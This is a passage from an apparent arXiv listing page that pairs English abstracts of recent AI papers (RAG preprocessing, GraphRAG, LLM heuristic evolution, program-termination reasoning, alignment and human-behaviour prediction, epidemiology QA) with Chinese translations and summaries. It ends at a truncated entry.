Retrieval-Augmented Generation (RAG) systems depend critically on the quality of document preprocessing, yet no prior study has evaluated PDF processing frameworks by their impact on downstream question-answering accuracy. We address this gap through a systematic comparison of four open-source PDF-to-Markdown conversion frameworks, Docling, MinerU, Marker, and DeepSeek OCR, across 21 pipeline configurations, varying the conversion tool, cleaning transformations, splitting strategy, and metadata enrichment. Evaluation was performed using a 50-question benchmark over a corpus of 36 Portuguese administrative documents (1706 pages, ~492K words), with LLM-as-judge scoring over 50 independent runs per configuration. Statistical significance was assessed via Wilcoxon signed-rank tests with Cohen's d effect sizes. Two baselines bounded the results: naïve PDFLoader (86.2%) and manually curated Markdown (91.3%). Docling with hierarchical splitting and image descriptions achieved the highest automated accuracy (94.1 +/- 1.6%), surpassing even manual curation. A per-question-type analysis revealed that table-dependent questions drive the largest accuracy differences, with a 33-percentage-point gap between basic and hierarchical splitting. Metadata enrichment and hierarchy-aware chunking contributed more to accuracy than the conversion framework alone. An exploratory GraphRAG implementation underperformed basic RAG (82% vs. 94.1%). These findings demonstrate that data preparation quality is the dominant factor in RAG system performance.

2604.04940 2026-05-27 cs.AI 版本更新

ReVEL: Multi-Turn Reflective LLM-Guided Heuristic Evolution via Structured Performance Feedback

ReVEL:基于结构化性能反馈的多轮反思式LLM引导的启发式进化

Cuong Van Duc, Minh Nguyen Dinh Tuan, Tam Vu Duc, Tung Vu Duy, Son Nguyen Van, Hanh Nguyen Thi, Binh Huynh Thi Thanh

发表机构 * Hanoi University of Science and Technology(河内科学技术大学) Phenikaa University(Phenikaa大学)

AI总结 针对NP-hard组合优化问题的启发式设计,提出ReVEL框架,通过行为感知分组和多轮迭代细化,利用LLM和累积性能反馈联合优化启发式,实验表明优于现有LLM引导的进化基线。

详情
AI中文摘要

为NP-hard组合优化问题设计有效的启发式仍然具有挑战性,通常需要大量的领域专业知识。最近的LLM引导的进化方法在自动启发式生成方面显示出前景,但大多数现有方法独立地或通过有限的成对反馈来细化启发式。我们提出ReVEL:基于结构化性能反馈的多轮反思式LLM引导的启发式进化,一个用于群体式多轮启发式细化的框架。ReVEL将启发式组织成行为感知的反思组,包括用于局部细化的相似性驱动组和用于探索性搜索的多样性驱动组。在每个组内,LLM使用累积的性能反馈执行迭代多轮细化,使得相关启发式能够在进化迭代中被联合分析和逐步改进。在标准组合优化基准上的实验表明,ReVEL在多种设置和LLM骨干下通常优于现有的LLM引导的进化基线。额外分析表明,行为感知分组有助于在迭代启发式进化过程中实现更一致的细化轨迹。

英文摘要

Designing effective heuristics for NP-hard combinatorial optimization problems remains challenging and often requires substantial domain expertise. Recent LLM-guided evolutionary methods have shown promise for automated heuristic generation, but most existing approaches refine heuristics independently or through limited pairwise feedback. We propose ReVEL: Multi-Turn Reflective LLM-Guided Heuristic Evolution via Structured Performance Feedback, a framework for group-wise multi-turn heuristic refinement. ReVEL organizes heuristics into behavior-aware reflective groups, including similarity-driven groups for localized refinement and diversity-driven groups for exploratory search. Within each group, the LLM performs iterative multi-turn refinement using accumulated performance feedback, enabling related heuristics to be jointly analyzed and progressively improved across evolutionary iterations. Experiments on standard combinatorial optimization benchmarks show that ReVEL generally improves optimization performance over existing LLM-guided evolutionary baselines across multiple settings and LLM backbones. Additional analyses suggest that behavior-aware grouping contributes to more consistent refinement trajectories during iterative heuristic evolution.

1403.1076 2026-05-27 cs.AI 版本更新

A Discussion to Qualify Intelligence

关于智能定义的探讨

Kieran Greer

发表机构 * Distributed Computing Systems(分布式计算系统)

AI总结 本文试图提出一个适用于自然世界和人工智能的统一智能定义,基于Kolmogorov复杂性理论提出度量标准,并区分智能与意识的不同。

Comments Newly edited version

详情
Journal ref
Scientific Insights, 2(1), pp. 1 - 15
AI中文摘要

我们对智能的理解主要针对人类水平。本文试图给出一个更统一的定义,可应用于整个自然世界,然后应用于人工智能。该定义更侧重于定性而非定量,并可能有助于对此问题做出判断。虽然正确行为是首选定义,但本文提出了一种基于Kolmogorov复杂性理论的度量标准,该标准引出了关于熵的测量。随后,本文提出了一种公认的人工智能测试版本作为“酸性测试”,这可能是自由思维程序试图实现的目标。作者最近的工作更多是从机械过程的角度出发,基于结构构建。本文认为智能是一种主动事件,但也注意到其背后存在一个机械性的次要方面。本文建议将智能和意识视为略有不同,其中意识是更机械的方面。事实上,一个令人惊讶的结论是,一个被动但智能的大脑可能由主动但不太智能的感官所激发。

英文摘要

Our understanding of intelligence is directed primarily at the human level. This paper attempts to give a more unifying definition that can be applied to the natural world in general and then Artificial Intelligence. The definition would be used more to qualify than quantify it and might help when making judgements on the matter. While correct behaviour is the preferred definition, a metric that is grounded in Kolmogorov's Complexity Theory is suggested, which leads to a measurement about entropy. A version of an accepted AI test is then put forward as the 'acid test' and might be what a free-thinking program would try to achieve. Recent work by the author has been more from a direction of mechanical processes, built from structure. This paper agrees that intelligence is a pro-active event, but also notes a second aspect to it that is in the background and mechanical. The paper suggests looking at intelligence and the conscious as being slightly different, where the conscious is this more mechanical aspect. In fact, a surprising conclusion can be a passive but intelligent brain being invoked by active and less intelligent senses.

2604.03785 2026-05-27 cs.AI cs.MA 版本更新

Communication Gain and Delay Cost Under Cross-Timestep Delays in Cooperative Multi-Agent Reinforcement Learning

跨时间步延迟下合作多智能体强化学习中的通信增益与延迟代价

Zihong Gao, Hongjian Liang, Lei Hao, Liangjun Ke

发表机构 * The State Key Laboratory for Manufacturing Systems Engineering(制造系统工程国家重点实验室) School of Automation Science and Engineering, Xi’an Jiaotong University(西安交通大学自动化科学与工程学院)

AI总结 针对部分可观测环境中跨时间步通信延迟导致的信息错位问题,提出通信增益与延迟代价(CGDC)度量,并基于此设计演员-评论家框架CDCMA,通过预测未来观测和注意力融合延迟消息来提升合作多智能体强化学习的性能、鲁棒性和泛化能力。

详情
AI中文摘要

在部分可观测的\emph{合作}多智能体强化学习中,通信对于协调至关重要,然而\emph{跨时间步}延迟会导致消息在生成后多个时间步才到达,造成时间错位,使得信息在消费时变得陈旧。我们将此设定形式化为延迟通信部分可观测马尔可夫博弈(DeComm-POMG),并将消息的影响分解为\emph{通信增益}和\emph{延迟代价},从而得到通信增益与延迟代价(CGDC)度量。我们进一步建立了一个价值损失界,表明由延迟消息引起的性能下降被一个折扣累积的信息差距所上界,该差距由及时消息与延迟消息所诱导的动作分布之间的差异衡量。在CGDC的指导下,我们提出了 extbf{CDCMA},一个演员-评论家框架,该框架仅在预测CGDC为正时请求消息,预测未来观测以减少消费时的错位,并通过CGDC引导的注意力融合延迟消息。在无队友视觉变体的合作导航和捕食者-猎物任务以及多个延迟级别的SMAC地图上的实验表明,该方法在性能、鲁棒性和泛化能力上均有一致提升,消融实验验证了每个组件的有效性。

英文摘要

Communication is essential for coordination in \emph{cooperative} multi-agent reinforcement learning under partial observability, yet \emph{cross-timestep} delays cause messages to arrive multiple timesteps after generation, inducing temporal misalignment and making information stale when consumed. We formalize this setting as a delayed-communication partially observable Markov game (DeComm-POMG) and decompose a message's effect into \emph{communication gain} and \emph{delay cost}, yielding the Communication Gain and Delay Cost (CGDC) metric. We further establish a value-loss bound showing that the degradation induced by delayed messages is upper-bounded by a discounted accumulation of an information gap between the action distributions induced by timely versus delayed messages. Guided by CGDC, we propose \textbf{CDCMA}, an actor--critic framework that requests messages only when predicted CGDC is positive, predicts future observations to reduce misalignment at consumption, and fuses delayed messages via CGDC-guided attention. Experiments on no-teammate-vision variants of Cooperative Navigation and Predator Prey, and on SMAC maps across multiple delay levels show consistent improvements in performance, robustness, and generalization, with ablations validating each component.

2603.25152 2026-05-27 cs.AI cs.IR 版本更新

OMD-GraphRAG: Enhancing GraphRAG with Ontology-Guided Extraction, Multi-Dimensional Clustering and Dual-Channel Fusion

OMD-GraphRAG:利用本体引导提取、多维聚类和双通道融合增强GraphRAG

Jie Wang, Honghua Huang, Xi Ge, Jianhui Su, Wen Liu, Shiguo Lian

发表机构 * Data Science & Artificial Intelligence Research Institute(数据科学与人工智能研究院)

AI总结 提出OMD-GraphRAG框架,通过本体引导知识提取、多维社区聚类和双通道图检索融合,提升GraphRAG在复杂推理和多跳查询中的性能。

详情
AI中文摘要

检索增强生成(RAG)系统在复杂推理、多跳查询和领域特定问答中面临重大挑战。尽管现有的GraphRAG框架在结构化知识组织方面取得了进展,但在知识提取精度、社区报告完整性和检索性能方面仍存在局限性。本文提出OMD-GraphRAG,一个基于开源GraphRAG构建的增强框架。该框架引入了三项核心创新:(1)本体引导知识提取,使用预定义Schema指导LLM准确识别领域特定实体和关系;(2)多维社区聚类策略,通过对齐完成、基于属性的聚类和多跳关系聚类提高社区完整性;(3)双通道图检索融合,通过混合图和社区检索平衡问答准确性和性能。在MultiHop-RAG基准上的评估结果显示,OMD-GraphRAG在综合F1分数上优于主流开源解决方案(如LightRAG),特别是在推理和时间查询方面。

英文摘要

Retrieval-Augmented Generation (RAG) systems face significant challenges in complex reasoning, multi-hop queries, and domain-specific QA. While existing GraphRAG frameworks have made progress in structural knowledge organization, they still have limitations in knowledge extraction precision, community report integrity, and retrieval performance. This paper proposes OMD-GraphRAG, an enhanced framework built upon open-source GraphRAG. The framework introduces three core innovations: (1) Ontology-Guided Knowledge Extraction that uses predefined Schema to guide LLMs in accurately identifying domain-specific entities and relations; (2) Multi-Dimensional Community Clustering Strategy that improves community completeness through alignment completion, attribute-based clustering, and multi-hop relationship clustering; (3) Dual-Channel Graph Retrieval Fusion that balances QA accuracy and performance through hybrid graph and community retrieval. Evaluation results on MultiHop-RAG benchmark show that OMD-GraphRAG outperforms mainstream open source solutions (e.g., LightRAG) in comprehensive F1 scores, particularly in inference and temporal queries.

2603.28345 2026-05-27 cs.SE cs.AI 版本更新

Where Code Meets Natural Language: Taxonomy-Driven Information Flow Analysis for LLM-Integrated Applications

当代码遇见自然语言:基于分类法的LLM集成应用信息流分析

Zihao Xu, Xiao Cheng, Ruijie Meng, Yuekang Li

发表机构 * University of New South Wales(新南威尔士大学) Macquarie University(麦考瑞大学) National University of Singapore(新加坡国立大学)

AI总结 提出一种基于定量信息流理论的分类法,定义24个标签以跨越LLM调用的自然语言与编程语言边界,实现信息流分析,并在污点传播和程序切片中验证有效性。

详情
AI中文摘要

LLM API调用正成为一种普遍的程序构造,但它们创建了一个现有程序分析无法跨越的边界:运行时值进入自然语言提示,在LLM内部经过不透明处理,然后作为程序消费的代码、SQL、JSON或文本重新出现。每个跨函数边界跟踪数据的分析,包括污点分析、程序切片、依赖分析和变更影响分析,都依赖于被调用者的数据流摘要。LLM调用没有这样的摘要,在我们称为NL/PL边界处打破了所有这些分析。我们提出了第一个信息流方法来跨越这个边界。基于定量信息流理论,我们的分类法沿两个正交维度定义了24个标签:信息保留级别(从词汇保留到完全阻塞)和输出模态(自然语言、结构化格式、可执行工件)。我们从4,154个真实世界Python文件中标记了9,083个占位符-输出对,并通过Cohen's κ=0.82和近乎完全的覆盖率(0.01%无法分类)验证了可靠性。我们在两个下游应用中展示了分类法的实用性:(1)一个两阶段污点传播管道,结合基于分类法的过滤和LLM验证,在353个专家注释对上达到F1=0.923,并在六个真实世界OpenClaw提示注入案例上的跨语言验证进一步确认了有效性;(2)基于分类法的反向切片在包含非传播占位符的文件中将切片大小平均减少了15%。每个标签的分析显示,四个阻塞标签几乎涵盖了所有非传播情况,为工具构建者提供了可操作的过滤标准。

英文摘要

LLM API calls are becoming a ubiquitous program construct, yet they create a boundary that no existing program analysis can cross: runtime values enter a natural-language prompt, undergo opaque processing inside the LLM, and re-emerge as code, SQL, JSON, or text that the program consumes. Every analysis that tracks data across function boundaries, including taint analysis, program slicing, dependency analysis, and change-impact analysis, relies on dataflow summaries of callee behavior. LLM calls have no such summaries, breaking all of these analyses at what we call the NL/PL boundary. We present the first information flow method to bridge this boundary. Grounded in quantitative information flow theory, our taxonomy defines 24 labels along two orthogonal dimensions: information preservation level (from lexically preserved to fully blocked) and output modality (natural language, structured format, executable artifact). We label 9,083 placeholder-output pairs from 4,154 real-world Python files and validate reliability with Cohen's $κ= 0.82$ and near-complete coverage (0.01\% unclassifiable). We demonstrate the taxonomy's utility on two downstream applications: (1)~a two-stage taint propagation pipeline combining taxonomy-based filtering with LLM verification achieves $F_1 = 0.923$ on 353 expert-annotated pairs, with cross-language validation on six real-world OpenClaw prompt injection cases further confirming effectiveness; (2)~taxonomy-informed backward slicing reduces slice size by a mean of 15\% in files containing non-propagating placeholders. Per-label analysis reveals that four blocked labels account for nearly all non-propagating cases, providing actionable filtering criteria for tool builders.

2601.18987 2026-05-27 cs.CL cs.AI cs.PL 版本更新

LLMs versus the Halting Problem: Characterizing Program Termination Reasoning

LLMs 与停机问题:程序终止推理的特征化

Oren Sultan, Jordi Armengol-Estape, Pascal Kesseli, Julien Vanegue, Dafna Shahaf, Yossi Adi, Peter O'Hearn

发表机构 * FAIR Team, Meta AI(Meta AI FAIR 团队) The Hebrew University of Jerusalem, Israel(耶路撒冷希伯来大学) Bloomberg, New York, USA(彭博社,纽约,美国) Imperial College London, UK(伦敦帝国理工学院,英国) University College London, UK(伦敦大学学院,英国)

AI总结 本文评估了前沿LLMs在程序终止推理上的能力,发现GPT-5和Claude Sonnet 4.5在C程序终止判断上达到顶级验证工具水平,但无法生成形式化证明,并引入分歧前置条件形式化描述非终止条件。

详情
AI中文摘要

判断程序是否终止是计算机科学中的一个核心问题。图灵的停机问题确立了终止的不可判定性,表明没有算法能普遍确定所有程序和输入的终止性。因此,验证工具近似地处理终止问题,有时无法证明或反驳;这些工具依赖于特定问题的架构,并且通常与特定的编程语言绑定。LLMs的最新进展提出了一个自然的问题:它们在多大程度上能够推理程序终止?我们在2025年国际软件验证竞赛(SV Comp)的一组多样化C程序上评估了前沿LLMs。我们的结果表明,GPT-5和Claude Sonnet 4.5(通过测试时缩放)达到了与顶级验证工具相当的分数。然而,尽管模型通常能正确推断程序是否终止,但它们经常无法构造一个见证作为形式化证明,揭示了语义识别与符号证明生成之间的差距。随着代码长度的增加,性能进一步下降。为了分析这一差距,我们引入了一个分歧前置条件形式化方法,将非终止条件描述为逻辑约束。我们希望这些发现能激励未来在现实世界终止基准测试、结合LLMs与符号验证方法的神经符号方法,以及更广泛地关于LLMs在其他不可判定问题上推理的研究。

英文摘要

Determining whether a program terminates is a central problem in computer science. Turing's Halting Problem established termination as undecidable, showing that no algorithm can universally determine termination for all programs and inputs. Hence, verification tools approximate termination, sometimes failing to prove or disprove; these tools rely on problem specific architectures, and are usually tied to particular programming languages. Recent advances in LLMs raise a natural question: To what extent can they reason about program termination? We evaluate frontier LLMs on a diverse set of C programs from the International Competition on Software Verification (SV Comp) 2025. Our results show that GPT-5 and Claude Sonnet 4.5 achieve scores comparable to top ranked verification tools (with test time scaling). However, while models often correctly infer whether programs terminate, they frequently fail to construct a witness as formal proof, revealing a gap between semantic recognition and symbolic proof generation. Performance further degrades as code length increases. To analyze this gap, we introduce a divergence precondition formulation that characterizes non termination conditions as logical constraints. We hope these findings motivate future research on real-world termination benchmarks, neuro-symbolic approaches that combine LLMs with symbolic verification methods, and, more broadly LLM reasoning on other undecidable problems.

2603.25415 2026-05-27 cs.AI cs.RO 版本更新

Modernising Reinforcement Learning-Based Navigation for Embodied Semantic Scene Graph Generation

具身语义场景图生成的强化学习导航现代化

Roman Küble, Marco Hüller, Mrunmai Phatak, Rainer Lienhart, Jörg Hähner

发表机构 * Organic Computing Group(有机计算组) Machine Learning and Computer Vision Group(机器学习与计算机视觉组) University of Augsburg(奥格斯堡大学) Am Technologiezentrum 8(技术中心8号) Augsburg, Germany(德国奥格斯堡)

AI总结 提出模块化导航组件,通过替换策略优化方法和重新设计离散动作表示,现代化具身语义场景图生成中的决策过程,并评估不同动作集和策略结构对场景图完整性、执行安全性和导航行为的影响。

详情
AI中文摘要

语义世界模型使具身智能体能够推理对象、关系和空间上下文,超越纯几何表示。在有机计算中,此类模型是在不确定性和资源约束下实现目标驱动自适应的关键。核心挑战是在有限动作预算内获取最大化模型质量和下游实用性的观测。语义场景图(SSG)为此提供了结构紧凑的表示。然而,在有限动作视界内构建SSG需要探索策略,在信息增益与导航成本之间权衡,并决定何时额外动作的收益递减。本文提出了用于具身语义场景图生成的模块化导航组件,并通过替换策略优化方法和重新审视离散动作公式来现代化其决策。我们研究了紧凑和更细粒度的较大离散动作集,并比较了原子动作上的单头策略与动作组件上的分解多头策略。我们评估了课程学习和基于深度的可选碰撞监督,并评估了SSG完整性、执行安全性和导航行为。结果表明,仅替换优化算法在相同奖励塑造下相对于基线将SSG完整性提高了21%。深度主要影响执行安全性(无碰撞运动),而完整性基本保持不变。将现代优化与更细粒度、分解的动作表示相结合,产生了最强的完整性-效率权衡。

英文摘要

Semantic world models enable embodied agents to reason about objects, relations, and spatial context beyond purely geometric representations. In Organic Computing, such models are a key enabler for objective-driven self-adaptation under uncertainty and resource constraints. The core challenge is to acquire observations maximising model quality and downstream usefulness within a limited action budget. Semantic scene graphs (SSGs) provide a structured and compact representation for this purpose. However, constructing them within a finite action horizon requires exploration strategies that trade off information gain against navigation cost and decide when additional actions yield diminishing returns. This work presents a modular navigation component for Embodied Semantic Scene Graph Generation and modernises its decision-making by replacing the policy-optimisation method and revisiting the discrete action formulation. We study compact and finer-grained, larger discrete motion sets and compare a single-head policy over atomic actions with a factorised multi-head policy over action components. We evaluate curriculum learning and optional depth-based collision supervision, and assess SSG completeness, execution safety, and navigation behaviour. Results show that replacing the optimisation algorithm alone improves SSG completeness by 21\% relative to the baseline under identical reward shaping. Depth mainly affects execution safety (collision-free motion), while completeness remains largely unchanged. Combining modern optimisation with a finer-grained, factorised action representation yields the strongest overall completeness--efficiency trade-off.

2601.04426 2026-05-27 cs.AI 版本更新

XGrammar-2: Efficient Dynamic Structured Generation Engine for Agentic LLMs

XGrammar-2: 面向智能体LLM的高效动态结构化生成引擎

Linzhang Li, Yixin Dong, Guanjie Wang, Ziyi Xu, Alexander Jiang, Tianqi Chen

发表机构 * Shanghai Jiao Tong University(上海交通大学) Carnegie Mellon University(卡内基梅隆大学) Carnegie Mellon University, NVIDIA(卡内基梅隆大学,NVIDIA)

AI总结 针对智能体LLM中动态结构化生成(如工具调用和响应协议)的挑战,提出XGrammar-2引擎,通过标签触发结构切换和跨语法子结构缓存实现高效编译与近零开销。

Comments 10 pages, ACM CAIS 26

详情
AI中文摘要

现代LLM智能体越来越依赖动态结构化生成,例如工具调用和响应协议。与具有静态结构的传统结构化生成不同,这些工作负载在请求之间和请求内部都有变化,给现有引擎带来了新的挑战。我们提出了XGrammar-2,一种用于动态智能体工作负载的结构化生成引擎。我们的设计基于两个关键思想:对标签触发的结构切换的一流支持,以及跨具有不同输出结构的请求的细粒度重用。具体来说,XGrammar-2引入了TagDispatch用于动态结构调度,以及Cross-Grammar Cache用于跨语法的子结构级缓存重用。它通过基于Earley的自适应令牌掩码缓存、即时编译和重复状态压缩进一步提高了效率。实验表明,XGrammar-2的编译速度比先前的结构化生成引擎快6倍以上,并且在现代LLM服务系统中几乎为零的端到端开销。

英文摘要

Modern LLM agents increasingly rely on dynamic structured generation, such as tool calling and response protocols. Unlike traditional structured generation with static structures, these workloads vary both across requests and within a request, posing new challenges to existing engines. We present XGrammar-2, a structured generation engine for dynamic agentic workloads. Our design is based on two key ideas: first-class support for tag-triggered structure switching, and fine-grained reuse across requests with different output structures. Concretely, XGrammar-2 introduces TagDispatch for dynamic structural dispatching and Cross-Grammar Cache for substructure-level cache reuse across grammars. It further improves efficiency with an Earley-based adaptive token mask cache, just-in-time compilation, and repetition state compression. Experiments show that XGrammar-2 achieves over 6x faster compilation than prior structured generation engines, and incurs near-zero end-to-end overhead in modern LLM serving systems.

2603.23994 2026-05-27 cs.LG cs.AI 版本更新

Understanding the Challenges in Iterative Generative Optimization with LLMs

理解大语言模型迭代生成优化中的挑战

Allen Nie, Xavier Daull, Zhiyi Kuang, Abhinav Akkiraju, Anish Chaudhuri, Max Piasevoli, Ryan Rong, YuCheng Yuan, Prerit Choudhary, Shannon Xiao, Rasool Fakoor, Adith Swaminathan, Ching-An Cheng

发表机构 * Google DeepMind(谷歌DeepMind) CNRS(国家科学研究中心) Stanford University(斯坦福大学) Carnegie Mellon University(卡内基梅隆大学) Microsoft(微软) AWS(亚马逊AWS) Netflix Research(Netflix研究) Microsoft Research(微软研究院)

AI总结 本文通过案例研究,揭示了在基于大语言模型的迭代生成优化中,起始工件、信用分配和批处理等隐藏设计选择对优化成败的决定性影响,并指出缺乏跨领域的通用学习循环设置方法是生产化和采用的主要障碍。

Comments 39 pages, 17 figures

详情
AI中文摘要

生成优化利用大型语言模型(LLMs)通过执行反馈迭代改进工件(如代码、工作流或提示)。这是一种构建自我改进代理的有前途的方法,但在实践中仍然脆弱:尽管有活跃的研究,只有9%的调查代理使用了任何自动优化。我们认为这种脆弱性是因为,为了建立学习循环,工程师必须做出“隐藏”的设计选择:优化器可以编辑什么,以及在每次更新时提供什么“正确”的学习证据?我们调查了影响大多数应用的三个因素:起始工件、执行轨迹的信用跨度,以及将试错批处理为学习证据。通过在MLAgentBench、Atari和BigBench Extra Hard中的案例研究,我们发现这些设计决策可以决定生成优化是否成功,然而它们在先前的工作中很少被明确说明。不同的起始工件决定了在MLAgentBench中哪些解决方案是可达到的,截断的轨迹仍然可以改进Atari代理,而更大的小批量并不会单调地改善BBEH上的泛化。我们得出结论,缺乏一种简单、通用的跨领域设置学习循环的方法是生产化和采用的主要障碍。我们为做出这些选择提供了实用指导。

英文摘要

Generative optimization uses large language models (LLMs) to iteratively improve artifacts (such as code, workflows or prompts) using execution feedback. It is a promising approach to building self-improving agents, yet in practice remains brittle: despite active research, only 9% of surveyed agents used any automated optimization. We argue that this brittleness arises because, to set up a learning loop, an engineer must make ``hidden'' design choices: What can the optimizer edit and what is the "right" learning evidence to provide at each update? We investigate three factors that affect most applications: the starting artifact, the credit horizon for execution traces, and batching trials and errors into learning evidence. Through case studies in MLAgentBench, Atari, and BigBench Extra Hard, we find that these design decisions can determine whether generative optimization succeeds, yet they are rarely made explicit in prior work. Different starting artifacts determine which solutions are reachable in MLAgentBench, truncated traces can still improve Atari agents, and larger minibatches do not monotonically improve generalization on BBEH. We conclude that the lack of a simple, universal way to set up learning loops across domains is a major hurdle for productionization and adoption. We provide practical guidance for making these choices.

2603.20020 2026-05-27 cs.CV cs.AI 版本更新

Detached Skip-Links and $R$-Probe: Decoupling Feature Aggregation from Gradient Propagation for MLLM OCR

分离跳跃链接与$R$-探针:解耦特征聚合与梯度传播用于MLLM OCR

Ziye Yuan, Ruchang Yao, Chengxin Zheng, Yusheng Zhao, Daxiang Dong, Ming Zhang

发表机构 * State Key Laboratory for Multimedia Information Processing, School of Computer Science, PKU-Anker LLM Lab, Beijing Key Laboratory of Software and Hardware Cooperative Artificial Intelligence Systems, Peking University, Beijing, China(多媒体信息处理国家重点实验室,计算机科学学院,PKU-Anker LLM实验室,软件与硬件协同人工智能系统北京重点实验室,北京大学,北京,中国) Tsinghua University, Beijing, China(清华大学,北京,中国) Baidu Inc, Beijing, China(百度公司,北京,中国)

AI总结 针对多模态大语言模型在OCR任务中因梯度干扰导致细粒度视觉信息丢失的问题,提出分离跳跃链接(Detached Skip-Links)以解耦前向特征聚合与反向梯度传播,并引入$R$-探针($R$-Probe)诊断视觉令牌的可重构性,从而提升OCR及通用多模态任务性能。

Comments Accepted by ICML 2026. Ziye Yuan and Ruchang Yao contributed equally to this work (co-first authors, listed in random order)

详情
AI中文摘要

多模态大语言模型(MLLMs)擅长高级推理,但在OCR任务中失败,因为细粒度视觉细节被破坏或错位。我们发现了多层特征融合中一个被忽视的优化问题。跳跃路径引入了从高级语义目标到早期视觉层的直接反向传播路径。这种机制覆盖了低级信号并破坏了训练稳定性。为了缓解这种梯度干扰,我们提出了分离跳跃链接(Detached Skip-Links),这是一种最小的修改,在前向传播中重用浅层特征,同时在联合训练期间停止通过跳跃分支的梯度。这种非对称设计减少了梯度干扰,提高了稳定性和收敛性,且无需增加可学习参数。为了诊断细粒度信息是否被保留并可供LLM使用,我们引入了$R$-探针($R$-Probe),它使用从LLM前四分之一层初始化的浅层解码器测量投影视觉令牌的像素级可重构性。在多个ViT骨干网络和多模态基准测试中,以及高达7M训练样本的规模下,我们的方法持续改进了以OCR为中心的基准测试,并在通用多模态任务上取得了明显提升。

英文摘要

Multimodal large language models (MLLMs) excel at high-level reasoning yet fail on OCR tasks where fine-grained visual details are compromised or misaligned. We identify an overlooked optimization issue in multi-layer feature fusion. Skip pathways introduce direct back-propagation paths from high-level semantic objectives to early visual layers. This mechanism overwrites low-level signals and destabilizes training. To mitigate this gradient interference, we propose Detached Skip-Links, a minimal modification that reuses shallow features in the forward pass while stopping gradients through the skip branch during joint training. This asymmetric design reduces gradient interference, improving stability and convergence without adding learnable parameters. To diagnose whether fine-grained information is preserved and usable by an LLM, we introduce $R$-Probe, which measures pixel-level reconstructability of projected visual tokens using a shallow decoder initialized from the first quarter of the LLM layers. Across multiple ViT backbones and multimodal benchmarks, and at scales up to 7M training samples, our approach consistently improves OCR-centric benchmarks and delivers clear gains on general multimodal tasks.

2603.17218 2026-05-27 cs.CL cs.AI cs.GT 版本更新

Alignment Makes Language Models Normative, Not Descriptive

对齐使语言模型变得规范,而非描述性

Eilam Shapira, Moshe Tennenholtz, Roi Reichart

发表机构 * Technion – Israel Institute of Technology(技术离子-以色列理工学院)

AI总结 通过对比120个基础-对齐模型对在超过10,000个真实人类决策中的表现,发现对齐诱导了规范性偏差:在单轮教科书式博弈中提升预测,但在多轮战略博弈中因忽略互惠、报复等描述性动态而损害预测。

详情
AI中文摘要

后训练对齐优化语言模型以匹配人类偏好信号,但这一目标并不等同于对观察到的人类行为进行建模。我们在多轮战略博弈——讨价还价、说服、谈判和重复矩阵博弈中,比较了120个基础-对齐模型对在超过10,000个真实人类决策上的表现。在这些设置中,基础模型在预测人类选择方面以近10:1的比例优于其对齐版本,这一结果在模型家族、提示表述和博弈配置中均稳健成立。然而,在人类行为更可能遵循规范预测的设置中,这一模式发生了逆转:对齐模型在所有12种测试的单轮教科书式博弈以及非战略彩票选择中占据主导地位——甚至在多轮博弈本身中,在交互历史发展之前的第一轮也是如此。这种边界条件模式表明,对齐诱导了规范性偏差:当人类行为相对较好地由规范性解决方案捕捉时,它改善了预测;但在多轮战略设置中,当行为由互惠、报复和依赖于历史的适应等描述性动态塑造时,它损害了预测。这些结果揭示了在优化模型以供人类使用和将其用作人类行为代理之间的根本权衡。

英文摘要

Post-training alignment optimizes language models to match human preference signals, but this objective is not equivalent to modeling observed human behavior. We compare 120 base-aligned model pairs on more than 10,000 real human decisions in multi-round strategic games - bargaining, persuasion, negotiation, and repeated matrix games. In these settings, base models outperform their aligned counterparts in predicting human choices by nearly 10:1, robustly across model families, prompt formulations, and game configurations. This pattern reverses, however, in settings where human behavior is more likely to follow normative predictions: aligned models dominate on one-shot textbook games across all 12 types tested and on non-strategic lottery choices - and even within the multi-round games themselves, at round one, before interaction history develops. This boundary-condition pattern suggests that alignment induces a normative bias: it improves prediction when human behavior is relatively well captured by normative solutions, but hurts prediction in multi-round strategic settings, where behavior is shaped by descriptive dynamics such as reciprocity, retaliation, and history-dependent adaptation. These results reveal a fundamental trade-off between optimizing models for human use and using them as proxies for human behavior.

2601.03471 2026-05-27 cs.CL cs.AI 版本更新

EpiQAL: Benchmarking Large Language Models in Epidemiological Question Answering and Reasoning

EpiQAL:大型语言模型在流行病学问答与推理中的基准测试

Mingyang Wei, Dehai Min, Zewen Liu, Yuzhang Xie, Guanchen Wu, Ziyang Zhang, Carl Yang, Max S. Y. Lau, Qi He, Lu Cheng, Wei Jin

发表机构 * Emory University(埃默里大学) University of Illinois Chicago(伊利诺伊大学香槟分校) Microsoft(微软公司)

AI总结 提出EpiQAL基准,通过三个子集(事实回忆、多步推理、不完整信息下结论重建)评估LLM在流行病学推理中的表现,发现当前模型在多步推理上表现有限。

Comments 31 pages, 7 figures, 25 tables

详情
AI中文摘要

可靠的流行病学推理需要综合研究证据来推断疾病负担、传播动态和人群层面的干预效果。现有的医学问答基准主要强调临床知识或患者层面的推理,但很少有系统评估基于证据的流行病学推理。我们提出了EpiQAL,这是首个针对多种疾病的流行病学问答诊断基准,包含三个从开放获取文献构建的子集。这三个子集逐步测试事实回忆、多步推理以及在不完整信息下的结论重建,并通过结合分类学指导、多模型验证和难度筛选的质量控制流程构建。对涵盖开源和专有系统的15个模型的实验表明,当前LLM在流行病学推理上表现有限,其中多步推理构成最大挑战。模型排名在不同子集间发生变化,仅靠规模并不能预测成功。思维链提示有利于多步推理,但在其他情况下效果不一。EpiQAL为证据基础、推理推理和结论重建提供了细粒度的诊断信号。

英文摘要

Reliable epidemiological reasoning requires synthesizing study evidence to infer disease burden, transmission dynamics, and intervention effects at the population level. Existing medical question answering benchmarks primarily emphasize clinical knowledge or patient-level reasoning, yet few systematically evaluate evidence-grounded epidemiological inference. We present EpiQAL, the first diagnostic benchmark for epidemiological question answering across diverse diseases, comprising three subsets built from open-access literature. The three subsets progressively test factual recall, multi-step inference, and conclusion reconstruction under incomplete information, and are constructed through a quality-controlled pipeline combining taxonomy guidance, multi-model verification, and difficulty screening. Experiments on fifteen models spanning open-source and proprietary systems reveal that current LLMs show limited performance on epidemiological reasoning, with multi-step inference posing the greatest challenge. Model rankings shift across subsets, and scale alone does not predict success. Chain-of-Thought prompting benefits multi-step inference but yields mixed results elsewhere. EpiQAL provides fine-grained diagnostic signals for evidence-grounding, inferential reasoning, and conclusion reconstruction.

2603.16870 2026-05-27 cs.CV cs.AI 版本更新

Demystifying Video Reasoning

揭秘视频推理

